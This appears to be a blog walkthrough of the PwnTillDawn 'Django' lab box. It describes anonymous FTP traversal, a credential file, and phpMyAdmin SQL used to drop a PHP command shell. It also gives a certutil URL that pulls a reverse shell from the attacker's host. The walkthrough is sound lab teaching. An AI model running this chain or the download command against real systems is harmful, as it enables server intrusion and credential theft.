Open in app

Sign in

Write

Sign in

PwnTillDawn Django Walkthrough

Syphonetic
3 min readApr 13, 2021

Introduction to PwnTillDawn

“PwnTillDawn Online Battlefield is a penetration testing lab created by wizlynx group where participants can test their offensive security skills in a safe and legal environment, but also having fun!”

Link: https://www.wizlynxgroup.com/ || https://online.pwntilldawn.com/

Django

This box consists of 4 flags for submission which can be obtained in numerous ways.

Reconnaissance

Nmap Scan results
Nikto Scan Results

Walkthrough

We accessed FTP using anonymous credentials and managed to find ourselves able to perform directory traversal. Listing the directory, we see that there is a FLAG directory, xampp-control.log and zen.txt.

We downloaded the files and looked into its content and found an interesting liner in xampp-control.log that points us to a potential text file containing potential credentials.

Content of xampp-control.log

Using the get command, we downloaded the passwords.txt to our system and viewed its content. Surely, it contains a set of credentials.

FLAG20.txt

Before we make use of the credentials, we listed the files from the directory “C:\xampp” from our FTP session and found FLAG20.txt residing in the same folder. By downloading the file, we will then get a hold of the flag.

Using the aforementioned credentials, we proceeded to http://10.150.150.212/phpmyadmin/ and logged in with the credentials there.

FLAG18

Digging around the website will show you the flag for flag18 under databases.

Further digging around, we found the SQL tab where we can use to write a file onto the server.

Creating a file test2.php on the server

Once the command is executed, we can access the test2.php and run a command to verify.

After confirming that the php upload works, we will then use this to download a webshell from our host machine through the following url:

http://10.150.150.212/test2.php?cmd=certutil -urlcache -split -f http://10.66.67.50/php_reverse_shell.php shell.php

For more information on the file upload method, there is a very informative guide that provides a list of methods that can be used.

Credits: https://medium.com/@PenTest_duck/almost-all-the-ways-to-file-transfer-1bd6bf710d65

Once we have downloaded the shell, we can access it after setting up a netcat listener and we will get a shell.

FLAG19.txt

FLAG11.txt

Hope this walkthrough helps people who are stuck!

Pwntilldawn
Django
Offensive Security
Walkthrough
Wizlynx

--

--

Syphonetic

Written by Syphonetic

0 Followers

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams